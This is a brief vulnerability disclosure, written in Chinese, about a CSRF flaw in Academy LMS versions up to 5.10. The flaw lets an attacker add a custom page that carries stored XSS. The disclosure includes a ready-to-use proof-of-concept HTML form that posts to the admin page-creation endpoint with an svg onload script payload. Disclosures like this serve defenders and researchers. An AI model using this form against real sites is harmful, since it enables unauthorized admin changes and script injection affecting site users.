Academy LMS <= 5.10 CSRF / XSS
Academy LMS 是一个用户可以创建和推广课程的应用程序。添加新页面的功能容易受到 CSRF 攻击,因为没有令牌来防止这种攻击。此外,该页面还可用于加载存储的 XSS 载荷。
我们的概念验证的第一步是使用管理员用户身份验证到平台。
之后,只需访问包含漏洞利用代码的页面,即可看到网站首页将添加一个新按钮,重定向到 xss 页面。
漏洞利用中使用的代码:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>